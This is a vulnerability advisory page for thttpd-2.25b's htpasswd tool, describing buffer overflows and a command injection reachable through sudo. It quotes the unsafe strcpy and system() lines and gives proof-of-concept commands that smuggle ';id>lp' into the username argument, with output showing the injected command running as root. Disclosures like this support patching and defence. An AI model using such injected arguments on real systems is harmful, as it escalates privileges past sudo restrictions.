thttpd-2.25b htpasswd Vulnerabilities

2018.10.03
Risk: Low
Local: Yes
Remote: No
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Title: thttpd-2.25b htpasswd Vulnerabilities Author: Larry W. Cashdollar, @_larry0 Date: 2006-03-04 CVE-ID:[CVE-2002-2389] Download Site: http://acme.com/software/thttpd/ Vendor: Acme Software Vendor Notified: 2006-03-04 Vendor Contact: thttpd@mail.acme.com Advisory: http://www.vapid.dhs.org/advisories/thttpd-2.25b_htpasswd_problems.html Description: thttpd is a simple, small, portable, fast, and secure HTTP server. Vulnerability: thttpd-2.25b** - Two buffer overflows and command execution in htpasswd.c. htpasswd is not installed setuid root, however in some user installations htpasswd might be executed via sudo. Exploting the above vulnerabilities would allow a non-priveledged user to circumvent sudo acls for example. <code c> line 189 strcpy(user,argv[2]); line 197 strcpy(l,line); line 215&216: sprintf(command,"cp %s %s",temp_template,argv[1]); system(command); </code> If perhaps sudo is being used to limit what commands a user can execute as www, you could run other commands like so: sudo -u www /bin/htpasswd -c "blah;id>lpo" webauth sudo -u www /bin/htpasswd "blah;id>lpo" webauth'' larry@mog:~$ sudo /bin/htpasswd -c "blh;id>lp" www larry@mog:~$ sudo /bin/htpasswd "blh;id>lp" www'' Changing password for user www New password: Re-type new password: larry@mog:~$ cat lp uid=0(root) gid=0(root) groups=0(root) larry@mog:~$ sudo id We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. Password Sorry, user larry is not allowed to execute '/usr/bin/id' as root on mog.

References:

http://www.vapidlabs.com/advisory.php?v=106


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top